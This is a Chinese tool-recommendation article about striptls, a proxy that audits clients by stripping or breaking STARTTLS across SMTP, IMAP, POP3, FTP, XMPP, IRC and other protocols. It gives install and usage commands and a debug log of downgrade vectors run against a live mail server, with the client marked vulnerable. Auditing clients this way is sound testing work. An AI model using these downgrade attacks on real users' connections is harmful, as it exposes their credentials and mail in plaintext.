工具推荐:striptls审计代理

安全 数据安全
STARTTLS 是对纯文本通信协议的扩展。它提供一种方式将纯文本连接升级为加密连接(TLS或SSL),而不是另外使用一个端口作加密通信。

STARTTLS 是对纯文本通信协议的扩展。它提供一种方式将纯文本连接升级为加密连接(TLS或SSL),而不是另外使用一个端口作加密通信。

[[163048]]

striptls是一款端口剥离攻击的POC实现。

SMTP

  1. SMTP.StripFromCapabilities - server response capability patch  
  2. SMTP.StripWithInvalidResponseCode - client STARTTLS stripping, invalid response code  
  3. SMTP.UntrustedIntercept - STARTTLS interception (client and server talking ssl) (requires server.pem in pwd)  
  4. SMTP.StripWithTemporaryError  
  5. SMTP.StripWithError  
  6. SMTP.ProtocolDowngradeStripExtendedMode  
  7. SMTP.InjectCommand 

POP3

  1. POP3.StripFromCapabilities  
  2. POP3.StripWithError  
  3. POP3.UntrustedIntercept 

IMAP

  1. IMAP.StripFromCapabilities  
  2. IMAP.StripWithError  
  3. IMAP.UntrustedIntercept  
  4. IMAP.ProtocolDowngradeToV2 

FTP

  1. FTP.StripFromCapabilities  
  2. FTP.StripWithError  
  3. FTP.UntrustedIntercept 

NNTP

  1. NNTP.StripFromCapabilities  
  2. NNTP.StripWithError  
  3. NNTP.UntrustedIntercept 

XMPP

  1. XMPP.StripFromCapabilities  
  2. XMPP.StripInboundTLS  
  3. XMPP.UntrustedIntercept  
  4. ACAP (untested)  
  5. ACAP.StripFromCapabilities  
  6. ACAP.StripWithError  
  7. ACAP.UntrustedIntercept 

IRC

  1. IRC.StripFromCapabilities  
  2. IRC.StripWithError  
  3. IRC.UntrustedIntercept  
  4. IRC.StripWithNotRegistered  
  5. IRC.StripCAPWithNotregistered  
  6. IRC.StripWithSilentDrop 

结果:

  1. - [*] client: 127.0.0.1 
  2. -     [Vulnerable!] <class striptls.StripWithInvalidResponseCode at 0xffd3138c>  
  3. -     [Vulnerable!] <class striptls.StripWithTemporaryError at 0xffd4611c>  
  4. -     [           ] <class striptls.StripFromCapabilities at 0xffd316bc>  
  5. -     [Vulnerable!] <class striptls.StripWithError at 0xffd4614c>  
  6. - [*] client: 192.168.139.1 
  7. -     [Vulnerable!] <class striptls.StripInboundTLS at 0x7f08319a6808>  
  8. -     [Vulnerable!] <class striptls.StripFromCapabilities at 0x7f08319a67a0>  
  9. -     [Vulnerable!] <class striptls.UntrustedIntercept at 0x7f08319a6870

实例:

  1. #> python -m striptls --help    # from pip/setup.py#> python striptls --help       # from source / root folderUsage: striptls [options]  
  2.  
  3.        example: striptls --listen 0.0.0.0:25 --remote mail.server.tld:25Options:  
  4.       -h, --help            show this help message and exit  -v, --verbose         make lots of noise [default]  
  5.       -l LISTEN, --listen=LISTENlisten ip:port [default: 0.0.0.0:<remote_port>]  
  6.       -r REMOTE, --remote=REMOTE  
  7.                             remote target ip:port to forward sessions to  
  8.       -k KEY, --key=KEY     SSL Certificate and Private key file to use, PEMformat assumed [default: server.pem]  
  9.       -x VECTORS, --vectors=VECTORS  
  10.                             Comma separated list of vectors. Use &#039;ALL&#039; (default)  
  11.                             to select all vectors. Available vectors:  
  12.                             FTP.StripFromCapabilities, FTP.StripWithError,  
  13.                             FTP.UntrustedIntercept, IMAP.StripFromCapabilities,  
  14.                             IMAP.StripWithError, IMAP.UntrustedIntercept,  
  15.                             NNTP.StripFromCapabilities, NNTP.StripWithError,  
  16.                             NNTP.UntrustedIntercept, POP3.StripFromCapabilities,  
  17.                             POP3.StripWithError, POP3.UntrustedIntercept,  
  18.                             SMTP.ProtocolDowngradeStripExtendedMode,  
  19.                             SMTP.StripFromCapabilities, SMTP.StripWithError,  
  20.                             SMTP.StripWithInvalidResponseCode,  
  21.                             SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept,  
  22.                             XMPP.StripFromCapabilities, XMPP.StripInboundTLS,  
  23.                             XMPP.UntrustedIntercept [default: ALL] 

安装:

1.从pip安装

#> pip install striptls

2.从源安装

#> setup.py install

示例:

  1.                 inbound                    outbound  
  2. nbound_peer]<------------->[listen:proxy]<------------->[outbound_peer/target]  
  3. smtp-client                   striptls                    remote/target 

本地 smtp-client -> localhost:8825 (代理) -> mail.gmx.net:25

审计模式:

在特定的情况下遍历所有协议并且跟踪违反starttls协议的客户端。你可以选择按Ctrl + C来中止审核并打印结果。

  1. #> python striptls --listen localhost:8825 --remote=mail.gmx.net:25  
  2. 2016-02-02 22:11:56,275 - INFO     - <Proxy 0xffcf6d0cL listen=('localhost'8825) target=('mail.gmx.net'25)> ready.  
  3. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP): <class striptls.StripFromCapabilities at 0xffd4632c>  
  4. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP): <class striptls.StripWithError at 0xffd4635c>  
  5. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP): <class striptls.UntrustedIntercept at 0xffd4638c>  
  6. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP): <class striptls.StripFromCapabilities at 0xffd4626c>  
  7. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP): <class striptls.StripWithError at 0xffd4629c>  
  8. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP): <class striptls.UntrustedIntercept at 0xffd462cc>  
  9. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP): <class striptls.StripFromCapabilities at 0xffd463ec>  
  10. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP): <class striptls.StripWithError at 0xffd4641c>  
  11. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP): <class striptls.UntrustedIntercept at 0xffd4644c>  
  12. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:110  , proto:    POP3): <class striptls.StripWithError at 0xffd461dc>  
  13. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:110  , proto:    POP3): <class striptls.UntrustedIntercept at 0xffd4620c>  
  14. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:25   , proto:    SMTP): <class striptls.StripFromCapabilities at 0xffd316bc>  
  15. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:25   , proto:    SMTP): <class striptls.StripWithError at 0xffd4614c>  
  16. 2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP): <class striptls.StripWithInvalidResponseCode at 0xffd3138c>  
  17. 2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP): <class striptls.StripWithTemporaryError at 0xffd4611c>  
  18. 2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP): <class striptls.UntrustedIntercept at 0xffd4617c>  
  19. 2016-02-02 22:11:56,276 - DEBUG    - * added test (port:5222 , proto:    XMPP): <class striptls.StripFromCapabilities at 0xffd464ac>  
  20. 2016-02-02 22:11:56,276 - INFO     - <RewriteDispatcher vectors={5222: set([<class striptls.StripFromCapabilities at 0xffd464ac>]), 110: set([<class striptls.UntrustedIntercept at 0xffd4620c>, <class striptls.StripWithError at 0xffd461dc>]), 143: set([<class striptls.StripWithError at 0xffd4629c>, <class striptls.UntrustedIntercept at 0xffd462cc>, <class striptls.StripFromCapabilities at 0xffd4626c>]), 21: set([<class striptls.UntrustedIntercept at 0xffd4638c>, <class striptls.StripFromCapabilities at 0xffd4632c>, <class striptls.StripWithError at 0xffd4635c>]), 119: set([<class striptls.StripWithError at 0xffd4641c>, <class striptls.UntrustedIntercept at 0xffd4644c>, <class striptls.StripFromCapabilities at 0xffd463ec>]), 25: set([<class striptls.StripWithInvalidResponseCode at 0xffd3138c>, <class striptls.StripWithTemporaryError at 0xffd4611c>, <class striptls.StripFromCapabilities at 0xffd316bc>, <class striptls.StripWithError at 0xffd4614c>, <class striptls.UntrustedIntercept at 0xffd4617c>])}>  
  21. 2016-02-02 22:12:08,477 - DEBUG    - <ProtocolDetect 0xffcf6eccL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)  
  22. 2016-02-02 22:12:08,530 - INFO     - <Session 0xffcf6e4cL> client ('127.0.0.1'28902) has connected  
  23. 2016-02-02 22:12:08,530 - INFO     - <Session 0xffcf6e4cL> connecting to target ('mail.gmx.net'25)  
  24. 2016-02-02 22:12:08,805 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server]          '220 gmx.com (mrgmx001) Nemesis ESMTP Service ready\r\n' 
  25. 2016-02-02 22:12:08,805 - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripWithInvalidResponseCode new: True>  
  26. 2016-02-02 22:12:09,759 - DEBUG    - <Session 0xffcf6e4cL> [client] => [server]          'ehlo [192.168.139.1]\r\n' 
  27. 2016-02-02 22:12:09,850 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n' 
  28. 2016-02-02 22:12:09,851 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250-STARTTLS\r\n250 STARTTLS\r\n' 
  29. 2016-02-02 22:12:09,867 - DEBUG    - <Session 0xffcf6e4cL> [client] => [server]          'STARTTLS\r\n' 
  30. 2016-02-02 22:12:09,867 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server][mangled] '200 STRIPTLS\r\n' 
  31. 2016-02-02 22:12:09,867 - DEBUG    - <Session 0xffcf6e4cL> [client] => [server][mangled] None 
  32. 2016-02-02 22:12:09,883 - DEBUG    - <Session 0xffcf6e4cL> [client] => [server]          'mail FROM:<a@b.com> size=10\r\n' 
  33. 2016-02-02 22:12:09,983 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server]          '530 Authentication required\r\n' 
  34. 2016-02-02 22:12:09,992 - DEBUG    - <Session 0xffcf6e4cL> [client] => [server]          'rset\r\n' 
  35. 2016-02-02 22:12:10,100 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server]          '250 OK\r\n' 
  36. 2016-02-02 22:12:10,116 - WARNING  - <Session 0xffcf6e4cL> terminated.  
  37. 2016-02-02 22:12:13,056 - DEBUG    - <ProtocolDetect 0xffd0920cL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)  
  38. 2016-02-02 22:12:13,056 - INFO     - <Session 0xffd0918cL> client ('127.0.0.1'28905) has connected  
  39. 2016-02-02 22:12:13,057 - INFO     - <Session 0xffd0918cL> connecting to target ('mail.gmx.net'25)  
  40. 2016-02-02 22:12:13,241 - DEBUG    - <Session 0xffd0918cL> [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n' 
  41. 2016-02-02 22:12:13,241 - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripWithTemporaryError new: True>  
  42. 2016-02-02 22:12:14,197 - DEBUG    - <Session 0xffd0918cL> [client] => [server]          'ehlo [192.168.139.1]\r\n' 
  43. 2016-02-02 22:12:14,289 - DEBUG    - <Session 0xffd0918cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n' 
  44. 2016-02-02 22:12:14,304 - DEBUG    - <Session 0xffd0918cL> [client] => [server]          'STARTTLS\r\n' 
  45. 2016-02-02 22:12:14,305 - DEBUG    - <Session 0xffd0918cL> [client] <= [server][mangled] '454 TLS not available due to temporary reason\r\n' 
  46. 2016-02-02 22:12:14,305 - DEBUG    - <Session 0xffd0918cL> [client] => [server][mangled] None 
  47. 2016-02-02 22:12:14,320 - DEBUG    - <Session 0xffd0918cL> [client] => [server]          'mail FROM:<a@b.com> size=10\r\n' 
  48. 2016-02-02 22:12:14,411 - DEBUG    - <Session 0xffd0918cL> [client] <= [server]          '530 Authentication required\r\n' 
  49. 2016-02-02 22:12:14,415 - DEBUG    - <Session 0xffd0918cL> [client] => [server]          'rset\r\n' 
  50. 2016-02-02 22:12:14,520 - DEBUG    - <Session 0xffd0918cL> [client] <= [server]          '250 OK\r\n' 
  51. 2016-02-02 22:12:14,535 - WARNING  - <Session 0xffd0918cL> terminated.  
  52. 2016-02-02 22:12:16,649 - DEBUG    - <ProtocolDetect 0xffd092ecL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)  
  53. 2016-02-02 22:12:16,650 - INFO     - <Session 0xffd0926cL> client ('127.0.0.1'28908) has connected  
  54. 2016-02-02 22:12:16,650 - INFO     - <Session 0xffd0926cL> connecting to target ('mail.gmx.net'25)  
  55. 2016-02-02 22:12:16,820 - DEBUG    - <Session 0xffd0926cL> [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n' 
  56. 2016-02-02 22:12:16,820 - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripFromCapabilities new: True>  
  57. 2016-02-02 22:12:17,760 - DEBUG    - <Session 0xffd0926cL> [client] => [server]          'ehlo [192.168.139.1]\r\n' 
  58. 2016-02-02 22:12:17,849 - DEBUG    - <Session 0xffd0926cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n' 
  59. 2016-02-02 22:12:17,849 - DEBUG    - <Session 0xffd0926cL> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n' 
  60. 2016-02-02 22:12:17,871 - WARNING  - <Session 0xffd0926cL> terminated.  
  61. 2016-02-02 22:12:20,071 - DEBUG    - <ProtocolDetect 0xffd093ccL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)  
  62. 2016-02-02 22:12:20,072 - INFO     - <Session 0xffd0934cL> client ('127.0.0.1'28911) has connected  
  63. 2016-02-02 22:12:20,072 - INFO     - <Session 0xffd0934cL> connecting to target ('mail.gmx.net'25)  
  64. 2016-02-02 22:12:20,239 - DEBUG    - <Session 0xffd0934cL> [client] <= [server]          '220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\r\n' 
  65. 2016-02-02 22:12:20,240 - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripWithError new: True>  
  66. 2016-02-02 22:12:21,181 - DEBUG    - <Session 0xffd0934cL> [client] => [server]          'ehlo [192.168.139.1]\r\n' 
  67. 2016-02-02 22:12:21,269 - DEBUG    - <Session 0xffd0934cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n' 
  68. 2016-02-02 22:12:21,280 - DEBUG    - <Session 0xffd0934cL> [client] => [server]          'STARTTLS\r\n' 
  69. 2016-02-02 22:12:21,281 - DEBUG    - <Session 0xffd0934cL> [client] <= [server][mangled] '501 Syntax error\r\n' 
  70. 2016-02-02 22:12:21,281 - DEBUG    - <Session 0xffd0934cL> [client] => [server][mangled] None 
  71. 2016-02-02 22:12:21,289 - DEBUG    - <Session 0xffd0934cL> [client] => [server]          'mail FROM:<a@b.com> size=10\r\n' 
  72. 2016-02-02 22:12:21,381 - DEBUG    - <Session 0xffd0934cL> [client] <= [server]          '530 Authentication required\r\n' 
  73. 2016-02-02 22:12:21,386 - DEBUG    - <Session 0xffd0934cL> [client] => [server]          'rset\r\n' 
  74. 2016-02-02 22:12:21,469 - DEBUG    - <Session 0xffd0934cL> [client] <= [server]          '250 OK\r\n' 
  75. 2016-02-02 22:12:21,485 - WARNING  - <Session 0xffd0934cL> terminated.  
  76. 2016-02-02 22:12:23,665 - WARNING  - Ctrl C - Stopping server  
  77. 2016-02-02 22:12:23,665 - INFO     -  -- audit results --  
  78. 2016-02-02 22:12:23,666 - INFO     - [*] client: 127.0.0.1 
  79. 2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!] <class striptls.StripWithInvalidResponseCode at 0xffd3138c>  
  80. 2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!] <class striptls.StripWithTemporaryError at 0xffd4611c>  
  81. 2016-02-02 22:12:23,666 - INFO     -     [           ] <class striptls.StripFromCapabilities at 0xffd316bc>  
  82. 2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!] <class striptls.StripWithError at 0xffd4614c

除了审计模式外还有从服务端剥离starttls、无效化starttls响应、不可行的ssl链接(对于客户端则是不在检验服务端的证书是否可信)以及XMPP的追踪审计的功能。

责任编辑:蓝雨泪 来源: FreeBuf
相关推荐

2016-04-12 10:18:19

代码审计自动化代码审计工具

2018-05-18 09:00:00

数据库审计GDPR

2022-05-09 09:43:33

物联网

2012-09-17 11:12:24

网络监控工具网络监控

2011-03-23 15:34:57

数据库审计

2014-02-20 11:31:34

last命令审计工具

2020-01-18 15:15:11

程序员WindowsJava

2020-04-03 16:07:31

DevSecOps开源安全工具

2013-11-21 10:21:25

2010-06-04 17:26:53

Linux 开发工具

2021-12-26 08:03:31

容器安全扫描工具漏洞

2010-12-29 09:50:06

数据库安全审计数据库审计

2010-12-27 14:45:27

2013-11-15 15:42:44

FruityWifi无线安全审计安全工具

2010-12-29 09:46:32

2017-11-02 15:10:23

2021-07-06 05:13:25

勒索软件CISA安全审计工具

2014-05-21 14:03:55

日志监控VDI

2021-10-29 09:32:47

Windows工具密码

2014-05-21 09:14:00

VDI审计日志监控监控
点赞
收藏

51CTO技术栈公众号